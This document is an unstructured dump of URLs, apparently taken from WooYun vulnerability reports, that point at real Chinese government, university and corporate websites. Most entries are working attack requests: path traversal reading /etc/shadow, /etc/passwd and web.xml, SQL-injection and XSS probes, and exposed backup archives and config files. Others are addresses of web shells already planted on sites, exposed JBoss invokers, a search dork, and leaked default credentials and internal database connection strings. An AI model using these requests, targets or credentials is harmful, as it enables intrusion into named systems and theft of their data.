http://www.hnzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://lbzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://60.171.34.186/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.lbzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://60.171.34.186/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.szzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.ydzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow 
http://www.fcxzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.lbzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.tlzbcg.com/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.sxzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.sixianzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.jzzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.xxzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.hnzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://lbzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://60.171.34.186/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.cnnb.com.cn/ http://ok.cnnb.com.cn/index.php/Article/view/id/885 https://github.com https://123.56.84.184:4848 http://www.weixinhai.com.cn/details/7/-133 http://www.weixinhai.com.cn/details/7/-133'.html http://**.**.**/ http://tp.xmnn.cn/wj/ http://tp.xmnn.cn/wj/adminlogin.php http://www.sdbys.cn http://202.108.5.43:9977/continuum/security/login.action http://www.chongxin.gansu.gov.cn/siteserver/login.aspx http://www.chongxin.gansu.gov.cn/1.aspx http://www.chongxin.gansu.gov.cn/SiteFiles/TemporaryFiles/contents/1.aspx http://newbbs.play.ifeng.com/uc_server/admin.php http://www.ytkd168.com/Query.asp?id=1313213 http://222.171.176.147/ http://222.171.176.147/VPLMP/tologin.action http://car.yundasys.com/cn/index.php/shopadmin/index.php http://www.11183.com.cn/ec-web/jsp/order/findShiptDetail.action?shipSid=295264 http://211.103.26.116/logs/ 
http://117.135.147.168/logs/ http://112.91.128.40/include/config.php.bak http://121.14.161.108/include/config.php.bak http://112.91.132.124/include/config.php.bak http://newsys.cheshi.com/soft/upload.php http://0563.gov.cn/data/admin/ver.txt http://ahhnczj.gov.cn/data/admin/ver.txt http://dy.wjjy.gov.cn/data/admin/ver.txt http://en.ljta.gov.cn/data/admin/ver.txt http://eqqh.gov.cn/data/admin/ver.txt http://gslgj.gov.cn/data/admin/ver.txt http://htta.gov.cn/data/admin/ver.txt http://hx.smeqh.gov.cn/data/admin/ver.txt http://jp.ljta.gov.cn/data/admin/ver.txt http://jsjhjw.gov.cn/data/admin/ver.txt http://lnlgb.gov.cn/data/admin/ver.txt http://lywsjd.gov.cn/data/admin/ver.txt http://lyzs.gov.cn/data/admin/ver.txt http://mxmxz.gov.cn/data/admin/ver.txt http://mzcourt.gov.cn/data/admin/ver.txt http://mzsw.gov.cn/data/admin/ver.txt http://mzta.gov.cn/data/admin/ver.txt http://nhzs.gov.cn/data/admin/ver.txt http://nqfda.gov.cn/data/admin/ver.txt http://ofa.lyg.gov.cn/data/admin/ver.txt http://sdnf.gov.cn/data/admin/ver.txt http://touzi.gov.cn/data/admin/ver.txt http://wjj.lyg.gov.cn/data/admin/ver.txt http://www.0563.gov.cn/data/admin/ver.txt http://www.0735.gov.cn/data/admin/ver.txt http://www.360.gov.cn/data/admin/ver.txt http://www.ahww.gov.cn/data/admin/ver.txt http://www.ally.gov.cn/data/admin/ver.txt http://www.aqws.gov.cn/data/admin/ver.txt http://www.cbdj.gov.cn/data/admin/ver.txt http://www.cdqc.gov.cn/data/admin/ver.txt http://www.cqan.gov.cn/data/admin/ver.txt http://www.csp.gov.cn/data/admin/ver.txt http://www.czw.gov.cn/data/admin/ver.txt http://www.dts.gov.cn/data/admin/ver.txt http://www.dzjw.gov.cn/data/admin/ver.txt http://www.dznw.gov.cn/data/admin/ver.txt http://www.eqqh.gov.cn/data/admin/ver.txt http://www.ffkj.gov.cn/data/admin/ver.txt http://www.frny.gov.cn/data/admin/ver.txt http://www.gsds.gov.cn/data/admin/ver.txt http://www.gxmj.gov.cn/data/admin/ver.txt http://www.gxws.gov.cn/data/admin/ver.txt http://www.gzqx.gov.cn/data/admin/ver.txt 
http://www.hfsf.gov.cn/data/admin/ver.txt http://www.hnmw.gov.cn/data/admin/ver.txt http://www.htta.gov.cn/data/admin/ver.txt http://www.jgip.gov.cn/data/admin/ver.txt http://www.jjq.gov.cn/data/admin/ver.txt http://www.jlmj.gov.cn/data/admin/ver.txt http://www.jmdj.gov.cn/data/admin/ver.txt http://www.jnql.gov.cn/data/admin/ver.txt http://www.jyei.gov.cn/data/admin/ver.txt http://www.jynw.gov.cn/data/admin/ver.txt http://www.lagm.gov.cn/data/admin/ver.txt http://www.lyyy.gov.cn/data/admin/ver.txt http://www.mseq.gov.cn/data/admin/ver.txt http://www.mzsw.gov.cn/data/admin/ver.txt http://www.mzta.gov.cn/data/admin/ver.txt http://www.nhzs.gov.cn/data/admin/ver.txt http://www.payx.gov.cn/data/admin/ver.txt http://www.qjcl.gov.cn/data/admin/ver.txt http://www.rkz.gov.cn/data/admin/ver.txt http://www.sdip.gov.cn/data/admin/ver.txt http://www.sdsg.gov.cn/data/admin/ver.txt http://www.shjs.gov.cn/data/admin/ver.txt http://www.snpc.gov.cn/data/admin/ver.txt http://www.suma.gov.cn/data/admin/ver.txt http://www.sxkx.gov.cn/data/admin/ver.txt http://www.szxx.gov.cn/data/admin/ver.txt http://www.tghl.gov.cn/data/admin/ver.txt http://www.tiyu.gov.cn/data/admin/ver.txt http://www.tjxq.gov.cn/data/admin/ver.txt http://www.whxc.gov.cn/data/admin/ver.txt http://www.wlds.gov.cn/data/admin/ver.txt http://www.wmnj.gov.cn/data/admin/ver.txt http://www.wnzx.gov.cn/data/admin/ver.txt http://www.wxjc.gov.cn/data/admin/ver.txt http://www.wxxw.gov.cn/data/admin/ver.txt http://www.wysi.gov.cn/data/admin/ver.txt http://www.wzta.gov.cn/data/admin/ver.txt http://www.xakh.gov.cn/data/admin/ver.txt http://www.xgjw.gov.cn/data/admin/ver.txt http://www.xpjm.gov.cn/data/admin/ver.txt http://www.xxga.gov.cn/data/admin/ver.txt http://www.xzsn.gov.cn/data/admin/ver.txt http://www.zbcy.gov.cn/data/admin/ver.txt http://www.zprk.gov.cn/data/admin/ver.txt http://www.zqjx.gov.cn/data/admin/ver.txt http://wxd.xa.gov.cn/data/admin/ver.txt http://xakh.gov.cn/data/admin/ver.txt 
http://xxh.nlk.gov.cn/data/admin/ver.txt http://xycbb.gov.cn/data/admin/ver.txt http://zsyz.pjw.gov.cn/data/admin/ver.txt http://zt.shaxi.gov.cn/data/admin/ver.txt http://111.13.53.132:7180/ http://111.13.53.132:7180/cmf/express-wizard/hosts http://eb.kaiyuanhotels.com/fwActivity/showList.htm?redirectAction:http://d.cn%23 se-extension://ext-1055834318/signin.html http://106.3.41.83:28017/ http://%s.baidu.com:%d/%s http://nzc.iap.ac.cn:8080/news.jsp?lng=c&opr=view&id=345 http://60.191.239.107/ http://202.85.222.170/login.html http://202.85.222.170:28017/ http://www.80ydw.com/movie/693.html http://hpa.pw/HHH http://hpa.pw/HHH的全文代码,会发现这个页面会跳转到http://221.233.160.110/images/xml.html http://dlsw.br.baidu.com/ditui/BaiduYouQianPartPackSilent_1.1.0.10_150946.exe,没错,来自百度有钱联盟的144MB的安装包。 http://www.saclub.com.cn/ http://www.saclub.com.cn/forgotCheck.do http://localhost/dz3.2_wwwroot/home.php?mod=space&uid=2&do=album&id=1 http://localhost/dz3.2_wwwroot/home.php?mod=space&uid=3&do=album&id=2 http://www.rhxwl.com/Server.asp http://www.sxpjgtmyjj.com/bszl/view.asp?id=6900 http://jh.zjmy.net/bszl/view.asp?id=6900 http://xc.xsunion.com/bszl/view.asp?id=6900 http://www.xsunion.com/bszl/view.asp?id=6900 http://xc.xsunion.com/bszl/view.asp?id=6900 http://www.lndca.gov.cn/plugins/1/AspxSpy.aspx http://xtfc.gov.cn/SiteServer/chd/upload/Fuck.aspx http://ajj.zhengzhou.gov.cn/ajj/index.jsp http://www.lndca.gov.cn http://wlxt.whut.edu.cn/new/%E6%A0%B9%E7%9B%AE%E5%BD%95%E6%96%87%E4%BB%B6%E5%A4%B9/1.aspx http://arts.hkbu.edu.hk/~upload/222.aspx http://jpkc.whmc.edu.cn/upload/users/system/JspSpy.jsp http://data.irr.zufe.edu.cn/record/help.jsp http://manage.soku.com http://211.151.146.96:81/WEB-INF/web.xml xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance http://java.sun.com/xml/ns/javaee xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd 
https://wiki.jasig.org/display/CASC/CAS+Client+for+Java+3.1 http://manage.soku.com http://211.151.146.96:8080/login http://10.103.51.107 http://shuili.enping.gov.cn:8000/Web/ContentDetail.aspx?id=6549 http://bce.baidu.com/.svn/entries http://180.149.144.214:8000/.svn/entries http://112.95.238.211:8080/ http://114.80.69.249:8070/Log/ http://supplier.sinopec.com:9001/RegInformationAction.do http://admissions.shisu.edu.cn/swweb/WEB-INF/gr.xml http://api.bdqn.cn//services/post/noteform http://gs.hust.edu.cn/listNews.do?where=smclsID=63 http://www.yzsgaj.gov.cn http://ll.yzsgaj.gov.cn http://www.yzglj.com/ http://www.ninyuan.gov.cn/ http://www.qy.gov.cn/ http://www.yzsgjj.gov.cn/ http://www.dx.gov.cn/ http://sjj.dx.gov.cn/ http://www.lst.gov.cn http://www.cnll.gov.cn http://jsw.lanshan.gov.cn/ http://da.yzsgaj.gov.cn http://www.lanshan.gov.cn http://www.axdjw.gov.cn http://www.yzjy.net:8080/ http://xsgygl.xmut.edu.cn http://www.cdfxds.com/ http://www.yzglj.com/cmsfile/extends/link/ajax.aspx?parentList=parentList&pid=&time=1417509866303 http://www.cnll.gov.cn/cmsfile/extends/link/ajax.aspx?parentList=parentList&pid=&time=1417509866303 http://www.dx.gov.cn/cmsfile/ajaj/content.aspx?oper=ajaxViewCount&id=convert%28int,user%29&cType=article&time=1417509887642 http://www.yzglj.com/cmsfile/ajaj/content.aspx?oper=ajaxViewCount&id=convert%28int,user%29&cType=article&time=1417509887642Id http://ll.yzsgaj.gov.cn/cmsfile/fckeditor//editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../..%2f https://113.108.232.152:4848 http://service.js.10086.cn/#home http://www.qlxj.gov.cn http://www.lhjw.gov.cn http://www.jjwomen.org http://www.jjqjcy.gov.cn http://www.tzlgb.gov.cn http://dns6.90576.com/tzqf/ https://uhost.ucloud.cn http://ekt1.wangqi.com/iframe_brief.php?style_id=1131202&language=cn http://ekt1.wangqi.com/iframe_brief.php?style_id=1131202%20and%201=1&language=cn 
http://ekt1.wangqi.com/iframe_brief.php?style_id=1131202%20and%201=11&language=cn index.php/shopadmin/index.php?app=site&ctl=admin_explorer_theme&act=save_image http://shop.xxx.com/index.php/shopadmin/index.php?app=site&ctl=admin_theme_widget&act=preview&theme=ecstore&file=../../../../../etc/passwd http://219.134.88.6 http://www.vlinkage.com http://www.chiscdc.com/ http://www.shhgzf.com:8280/index.asp http://221.230.140.60:8080/index.asp http://218.93.201.187:8888/index.asp http://221.230.8.231:8081/ http://222.184.250.2:8001/ http://58.211.131.154:84/ http://58.221.214.82:82/ http://58.214.247.138:8088/indextjgr.asp http://yianjkong.vicp.cc:8081/index.asp http://www.szcdc.cn/wstjnew/index.asp http://58.221.214.82:82/为例 http://58.221.214.82:82 intitle:mongod inurl:28017 intitle:mongod inurl:28017 www.ztemall.com http://218.30.99.121/biz/login.action http://keyan.sufe.edu.cn/business/oa/download.download?id=45 http://ecampus.sysu.edu.cn/ky/business/oa/download.download?id=45 http://59.72.0.2/business/oa/download.download?id=45 http://mimmo.sdo.com/config/config_ucenter.php.bak备份文件 http://mimmo.sdo.com/source/plugin/pcmgr_url_safeguard/url_api.inc.php http://xbhg.cnpc.com.cn/ http://xbhg.cnpc.com.cn/ExtranetWeb/loginDo.do jdbc:oracle:thin:@10.88.182.5:1521:orcl jdbc:oracle:thin:@//10.21.24.30:1526/wwwdb www.guh-software.de http://121.207.243.91:8001/web/login http://erp.fang.com/article.aspx?aid=117 http://card.cnki.net/orderCard.action site:ydyzc.hnedu.cn inurl:twc_user/twc.do?status=viewCollege http://ydyzc.hnedu.cn/twc_user/twc.do?status=viewCollege&begin=1&page=60&t=8969 http://www.codoon.com/feed/get_praise_feed?feed_id=赞ID&value=1 www.fangjia.com http://www.cchve.com.cn/hep/plugin/gaozhi/index/index.jsp http://kejichu.zhbit.com:9090/CMS/main/showStatistics.action?year=2013 http://kejichu.zhbit.com:9090/CMS/main/activeFileList.action?keyword= http://job.cnooc.com.cn/psearchj.asp?gzdd=0&job=0&what='&date=锟斤拷锟斤拷 http://lining.hftnet.com/Navigation.aspx 
http://lining.hftnet.com/Login.aspx http://ppt.edri.sinopec.com:80/CN/item/downloadFile.jsp?filedisplay=../../WEB-INF/web.xml http://gj.hn118114.cn http://117.139.74.33/lshr/ http://**.**.**/ https://github.com/map612/statistic/blob/df682ba87f3fa2f69e1fa5d5da3e3727ab3855e2/src/main/java/com/common/mail/mail.properties http://124.88.215.126/logout.shtml url:http://www.corriere.it/clickregister/ClickElementInfo.action http://120.35.26.113:19994/crm/ http://www.sxcw.com/jjjc/news.asp?id=351 http://www.eszfdc.gov.cn/page/create_fin.asp?id=2633 http://corp.1disk.cn/index.aspx http://x.zgyd.org/auppub/2012/04/21/832/0111.jpg http://fjhw.com.cn:8080/admin/login.php http://223.203.209.148/ http://222.73.2.200:8011/ http://www.shenhoulong.com/SHLCMS42/ http://119.147.161.103:7180/ http://124.119.97.2:8081/default.aspx http://60.13.227.250:8082/default.aspx http://lntjs.vicp.net/fgfw-detail.asp?NewsID=1 http://113.106.93.207/ http://www.softtone.cn//softwarer/Admin/login.asp http://120.196.134.134/softwarer/Adm http://adidas.hftchina.cn/ http://adidasbbs.hftchina.cn/ http://adidasbbs.hftchina.cn/admin/index.aspx http://adidasbbs.hftchina.cn/admin/asp.asp http://www.cmread.com/,来到移动和阅读网站,点击听书,进入到移动听书频道,如图所示: http://www.cmread.com/www/listenbookplay?&bid=396591468&cid=396591471&formPage=freeBook网址进入播放器的框架浏览界面进行播放,如图所示: http://yn10010.com/www.rar http://zixun.ehaier.com/ http://zixun.ehaier.com/wp-content/themes/radius/404.php http://job.shenzhenair.com http://job.shenzhenair.com/interface/download/file/LzIwMTQtMTAtMjgvZmlsZS9zcmMvNGIzOTY3Yjc5ZDMzZmYyYTUwLmRvYw,,/name/MjAxNeagoeWbreaLm-iBmOe7iOWuoemAmuefpe-8iOesrOWbm-aJue-8iS5kb2M,/ http://job.shenzhenair.com/interface/download/file//2014-10-28/file/src/4b3967b79d33ff2a50.doc/name/2015校园招聘终审通知(第四批).doc/ http://www.wooyun.org/bugs/wooyun-2014-085759 http://0so.so http://saiqi.0so.so/denglu/login.aspx http://saiqi.0so.so/denglu/index.aspx?username=%E6%9D%8E%E9%82%B5%E5%90%8C&userpass=123456&userid=1 
http://booking.mz16.cn/wp-admin/ http://bbs.91w.cc http://www.163.com//13230455278@163.com http://blog.sina.com.cn/ jboss:http://olms.sinopec.com:80/invoker/JMXInvokerServlet http://edcard.sinopec.com:80/invoker/JMXInvokerServlet http://116.228.70.245:8088/it/ip/web/interactiveplatform/equipmentreport/ProcessReport/ER_SearchAllReport.aspx ip:61.129.34.60 http://dhs.21vianet.com/dhs/site0.php?ID=55 http://www.0437.gov.cn/1.rar http://www.ahpfpc.gov.cn/1.rar http://www.ahsz.gov.cn/1.rar http://www.bbcg.gov.cn/wwwroot.rar http://www.bbsti.gov.cn/1.zip http://www.bbsti.gov.cn/bbsti.gov.cn.zip http://www.bdhxq.gov.cn/bdhxq.rar http://www.bdhxq.gov.cn/bdhxq.zip http://www.bjmf.gov.cn/a.rar http://www.cnci.gov.cn/1.rar http://www.cqnagt.gov.cn/www.rar http://www.cqyzfy.gov.cn/cqyzfy.rar http://www.cshb.gov.cn/1.rar http://www.czepb.gov.cn/czepb.rar http://www.czfdc.gov.cn/1.rar http://www.dlhitech.gov.cn/db.rar http://www.dxjfj.gov.cn/dxjfj.rar http://www.dyqwj.gov.cn/dyqwj.rar http://www.dyty.gov.cn/dyty.rar http://www.dzjw.gov.cn/1.rar http://www.fxgjj.gov.cn/1.rar http://www.gaoqing.gov.cn/gaoqing.rar http://www.gdwsxf.gov.cn/www.gdwsxf.gov.cn.rar http://www.gdwsxf.gov.cn/www.rar http://www.gdzl.gov.cn/data.rar http://www.glj.hnloudi.gov.cn/template.rar http://www.gxdzzl.gov.cn/gxdzzl.rar http://www.gxxy.gov.cn/wwwroot.rar http://www.gzpf.gov.cn/gzpf.gov.cn.zip http://www.gzsmzt.gov.cn/test.zip http://www.haiyan.gov.cn/test.zip http://www.hebroads.gov.cn/hebroads.gov.cn.rar http://www.hfjjzd.gov.cn/1.rar http://www.hflib.gov.cn/hflib.rar http://www.hfyl.gov.cn/1.zip http://www.hljda.gov.cn/1.rar http://www.hndt.gov.cn/hndt.rar http://www.hnforestry.gov.cn/hnforestry.rar http://www.hnsfj.gov.cn/hnsfj.rar http://www.hnst.gov.cn/1.zip http://www.hsepb.gov.cn/test.rar http://www.hzjj.gov.cn/wwwroot.rar http://www.jata.gov.cn/jata.rar http://www.jhrf.gov.cn/jhrf.gov.cn.rar http://www.jhrf.gov.cn/jhrf.rar http://www.jinyun.gov.cn/1.rar http://www.jxjt.gov.cn/data.rar 
http://www.ljxw.gov.cn/ljxw.gov.cn.rar http://www.lnwater.gov.cn/lnwater.rar http://www.luozhuang.gov.cn/1.rar http://www.lygfy.gov.cn/lygfy.rar http://www.lyjs.gov.cn/lyjs.zip http://www.lzanning.gov.cn/test.rar http://www.nbedu.gov.cn/1.rar http://www.nbmz.gov.cn/1.rar http://www.nbmz.gov.cn/1.zip http://www.ngxfw.gov.cn/ngxfw.gov.cn.rar http://www.ningxiangjcy.gov.cn/data.rar http://www.njpf.gov.cn/njpf.rar http://www.nlk.gov.cn/template.zip http://www.nmgdj.gov.cn/test.zip http://www.nmgsft.gov.cn/1.zip http://www.nqjh.gov.cn/1.zip http://www.nqnj.gov.cn/nqnj.rar http://www.nssh.gov.cn/template.rar http://www.paly.gov.cn/template.rar http://www.ptfwzx.gov.cn/wwwroot.rar http://www.qdeic.gov.cn/data.rar http://www.qhdwj.gov.cn/test.rar http://www.qhga.gov.cn/template.rar http://www.qzzx.gov.cn/www.qzzx.gov.cn.rar http://www.rzhb.gov.cn/rzhb.rar http://www.sfjd.gov.cn/sfjd.gov.cn.rar http://www.sm.fjaic.gov.cn/a.rar http://www.smenmg.gov.cn/data.rar http://www.smeyl.gov.cn/smeyl.rar http://www.sxch.gov.cn/a.rar http://www.sxsfpb.gov.cn/template.rar http://www.sydd.gov.cn/1.rar http://www.sygzw.gov.cn/1.rar http://www.szepb.gov.cn/szepb.rar http://www.taishanwj.gov.cn/wwwroot.rar http://www.tlepb.gov.cn/wwwroot.rar http://www.tzb.fy.gov.cn/data.rar http://www.tzty.gov.cn/tzty.zip http://www.wcb.yn.gov.cn/1.rar http://www.wdrc.gov.cn/1.rar http://www.wzmz.gov.cn/wzmz.rar http://www.wzta.gov.cn/data.rar http://www.xcagri.gov.cn/data.rar http://www.xcrs.gov.cn/template.rar http://www.xdrc.gov.cn/wwwroot.rar http://www.xjhbk.gov.cn/1.rar http://www.xnzg.gov.cn/xnzg.gov.cn.zip http://www.xqw.gov.cn/xqw.rar http://www.yc.gov.cn/1.rar http://www.yhgq.gov.cn/yhgq.rar http://www.yixian.gov.cn/root.zip http://www.yulin.gov.cn/a.zip http://www.yxjjj.gov.cn/wwwroot.rar http://www.yxlyj.gov.cn/yxlyj.rar http://www.zjkyx.gov.cn/zjkyx.rar http://www.zsghj.gov.cn/db.rar http://www.nqu.edu.tw/cht/index.php?code=list&flag=detail&ids=12&article_id=23431 
http://www.nqu.edu.tw/phpmyadmin/ http://www.oilphoto.com.cn/index/wanu?action=show&id=26 http://xxx.com/emaillist/cancelmail.php?u_mail=1&token=,其中u_mail=1存在注入漏洞 http://my-learning.mindray.com http://192.168.1.24/webmail/client/mail/index.php?module=operate&action=attach-img-preview&d_url=1.gif&type=application/octet-stream http://lz.tjglj.com/index.html http://www.guobin.net/admin/upfile/uppdf.asp http://58.215.137.246/ http://economy.nankai.edu.cn/ http://my.csdn.net/baidu_24193625 http://120.202.17.142/woms/ inurl:/opac/search.php,影响范围很大 http://120.195.143.181:9090/opac/search.php http://120.195.143.181:9090/opac/openlink.php?strText=sssssssssssssss&doctype=ALL&strSearchType=title&match_flag=forward&displaypg=20&sort=CATA_DATE&orderby=desc&showmode=list&location=ALL ftp://www.51fanfan.cn/ www.bilibili.com http://ife.airchina.com/webapps/HAWAII/download.php?filename=../../../../../etc/passwd url:http://xzsp.forestry.gov.cn:8088/pubnet/home.do url:http://oa.mendale.com:89/m1/login.do http://oa.mendale.com:89/m1/login.do http://blog.sohu.com/s/MTg0NjgxNTA2/entry/ http://www.atwasoft.com/ http://www.atwasoft.com:8080/monitor/extview/ http://nlp.ict.ac.cn/project/zhuanyijia/index.php/Index/login.html web3.sdufe.edu.cn/jike web3.sdufe.edu.cn/jike/siteserver/login.aspx http://221.6.246.117/ url:http://www.sinomach.com.cn/web.rar http://demo.kesioncms.com url:http://demo.kesion.com/html/xwpd/gn/2629.html http://demo.kesion.com/plus/digmood/Comment.asp?Action=WriteSave&ChannelID=1&InfoID=2629&C_Content=TEST&AnounName=paultest&Pass=91e31e2ef2076caf&sC_Content=TEST&SubmitComment=%u786E%u8BA4%u53D1%u8868&_=1417434539341 http://demo.kesion.com/plus/digmood/Comment.asp?Action=WriteSave&ChannelID=1&InfoID=2629&C_Content=TEST&AnounName=admin&Pass=91e31e2ef2076caf&sC_Content=TEST&SubmitComment=%u786E%u8BA4%u53D1%u8868&_=1417434539341 http://demo.kesion.com/html/xwpd/gn/2629.html http://119.253.41.10:8018/U8SL/Login.aspx http://xinwen.nwu.edu.cn/ 
http://www.fsnhyyjt.com/login.action http://testwww.xiamenair.com:1212/specialoffers/detail?guid=d19c4ab4-4851-4348-9f71-089408cf99cd http://ec.sgeg.shenhuagroup.com.cn/news/index.jsp?ins_id=1840&cg_name=gonggao1 http://zx.xj169.com/web/getSmsPwdCode.action http://114.251.1.140/gps/login.jsp user:admin password:123456 http://fzf.vastpay.cn/login.action http://www.ltt-hna.com:80/ www.ltt-hna.com http://hb.lawyeredu.com/common/index.pl http://ha.lawyeredu.com/manager/common/login.pl http://dg.lawyeredu.com/common/index.pl http://wzjc.lawyeredu.com/common/index.pl http://wz.lawyeredu.com/common/index.pl http://nj.lawyeredu.com/common/index.pl http://gx.lawyeredu.com/common/index.pl http://cc.lawyeredu.com/common/index.pl http://hi.lawyeredu.com/common/index.pl http://cq.lawyeredu.com/common/index.pl http://114.251.15.2/gams/login.php http://114.251.15.2/gams/login.php http://www.gxkjks.com/Web_Org/PxShop_Index.aspx?publishingid=106 http://www.ndddpx.com/Web_Org/PxShop_Index.aspx?publishingid=106 http://www.jzkjpx.cn/Web_Org/PxShop_Index.aspx?publishingid=106 http://webcourse.vixue.net/Web_Org/PxShop_Index.aspx?publishingid=106 http://www.fenghuaedu.net/Web_Org/PxShop_Index.aspx?publishingid=106 http://www.zhiyuan-peixun.com/Web_Org/PxShop_Index.aspx?publishingid=106 http://www.gd-jxjy.com/Web_Org/PxShop_Index.aspx?publishingid=106 http://px2.timber2005.com/Web_Org/PxShop_Index.aspx?publishingid=106 http://www.ylscjb.cn/Web_Org/PxShop_Index.aspx?publishingid=106 https://ieeetv.ieee.org/page404.action;jsessionid=C8745BD163B5F68088E4C22DE2149FBB http://xzk.d1xz.net/album/a227/s0/t0 http://course1.jincin.com/course.htm?courseId=1330 ip:111.161.126.181 http://61.187.92.238:8105/CxCMS/index.php/Detailb/index?id=38&aid=293 http://61.187.92.238:8280/jgxy/index.php?m=News&a=detail&showid=208&id=185 ip:106.3.36.238 http://cx.jszg.haedu.cn/jszgcsjgcx.aspx http://60.208.106.165:8002/login www.xxx.com/do.php?act=user_favorite_del,POST的内容中有个参数favorite,存在注入。 
http://shpd.jcrb.com/detail.php?id=1&infoid=1166&en=c http://m.jiayuan.com/ http://60.191.53.126:8080/amount/bak.jsp http://iot.189.cn/backendadmin/login.html http://www.zzjtysj.gov.cn/sec.php http://hysslj.gov.cn/ http://hysslj.gov.cn/uploads/test77.PHp http://www.jiuxindai.com/ http://ebank.spdb.com.cn/net/gb/www/perLogoURL.jsp?id=%27;alert%281%29;%27 http://www.milord.com.cn/ http://www.milord.com.cn/UserLogin.aspx www.milord.com.cn http://www.milord.com.cn http://ec.sgeg.shenhuagroup.com.cn/20131113/ http://sgeg.eccl.com.cn/vendorLogin!input.action ip:106.3.38.38 www.zzyedu.org/University/news.asp?class2id=138 inurl:www.uxin.com/pcpage2.0/ http://www.uxin.com/pcpage2.0/newpay.php?uid=70924284&pwd=769c005e493d128ce7ca6c97bc648d62 VERSION:1.2.3 http://mock.tdx.com.cn/log.aspx http://221.2.171.59:8200/webcwgkzhen.aspx?deptid=52 http://218.58.124.131:8003/webcwgkzhen.aspx?deptid=4538 http://222.135.109.70:8200/webcwgkzhen.aspx?deptid=54 http://218.56.40.229:8005/webcwgkzhen.aspx?deptid=3942 http://221.2.149.47:8200/webcwgkzhen.aspx?deptid=144&zd=259 http://218.56.99.84:8003/webcwgkzhen.aspx?deptid=3942 http://222.134.154.214:8001/webcwgkzhen.aspx?deptid=3942 http://222.134.66.54:8014/webcwgkzhen.aspx?deptid=3942 http://zuss.zju.edu.cn/sdc/jbxx.do?method=show&gnmkdm=N01012&type=ptzjz&xh=3140101021 http://115.29.79.164/ http://222.135.109.70:8300/sysmanage/jwhzdview.aspx?newsid=409 http://123.134.189.60:8016/bmfw/jwhzdview.aspx?newsid=11266 http://221.2.149.47:8200/bmfw/jwhzdview.aspx?newsid=540 http://218.56.40.229:8061/bmfw/jwhzdview.aspx?newsid=11726 http://222.135.76.147:8300/sysmanage/jwhzdview.aspx?newsid=1762 http://art.sanguosha.com/detail.php?id=24 http://king.sanguosha.com/ http://mail.wo.cn http://www.zx110.org/loginUser.do ftp://218.58.70.229/ http://zone.wooyun.org/content/7790 http://oms.haier.com/fckeditor/editor/fckeditor.html http://116.213.76.41:8080/ app.syzsks.com/county/viewcontent.jsp?id=227 http://www1.snut.edu.cn/wyxy/management/login.asp 
http://www1.snut.edu.cn/tzb/index.asp http://www1.snut.edu.cn/tzb/case/detail.asp?id=96 http://www1.snut.edu.cn/tzb/admin/index.asp http://www.cttgz.com/PageTemplate.asp?ID={F677A60D-F4D8-45D9-B29C-8F5C4A938107 http://www.cdt.cc/sjzx_xx.php?id=97 http://www.cdt.cc/1.php http://jwxt.tzpc.edu.cn/jxpj/pj_admin_left.asp http://jwxt.nnutc.edu.cn//jxpj/pj_admin_left.asp http://www1.szitu.cn:86//jxpj/pj_admin_left.asp http://222.187.199.60//jxpj/pj_admin_left.asp http://jwcx.czie.net//jxpj/pj_admin_left.asp http://jwxt.tzpc.edu.cn//jxpj/pj_admin_left.asp http://www.mcsc.com.cn/anshow.php?id=1279 http://www.mcsc.com.cn/honorDisplay.php?partid=25 http://www.mcsc.com.cn/EInformation.php http://www.mcsc.com.cn/file.php?partid=13 http://www.mcsc.com.cn/industryNews.php?partid=14 http://www.mcsc.com.cn/informationActivitys.php?partid=15 http://www.mcsc.com.cn/Introduction.php?partid=30 http://www.mcsc.com.cn/moreInfor.php?partid=36 http://www.mcsc.com.cn/societyLatest.php?partid=13 http://www.mcsc.com.cn/vipMem.php?ruhuiIdentity=&username=12345 http://www.mcsc.com.cn/vipMem.php?partid=43 http://www.mcsc.com.cn/loginInfo.php http://www.mcsc.com.cn/regUserInfo.php http://www.mcsc.com.cn/css/ http://www.mcsc.com.cn/icons/ http://**.**.**/Default.aspx_ http://px.xmrc.com.cn/unitAction!goRegister.action http://218.10.227.2/hbj/login.action http://www.xiaomd.com/index.action http://www.auxgroup.com/productlist.aspx?nodecode=0002 www.dfss.com.cn http://www.dfss.com.cn/manage/EditAdmin.aspx http://jxyj.sdbi.edu.cn/yns_upload.asp http://jxyj.sdbi.edu.cn/yns_upload.asp?GP_upload=true http://jxyj.sdbi.edu.cn/yns_upload.asp http://wooyun.org/bugs/wooyun-2014-085148 http://www.myhm.org/bys/login/?csid=gY0&bz=C http://218.89.178.234:8080/ ip:61.129.93.246 http://www.lysfda.gov.cn/Article_Print.asp?ArticleID=706 http://www.lysfda.gov.cn/admin_login.asp http://117.34.102.36:8080/vrd/front/userInfo/gotoIndex.action http://pop.wanda.cn 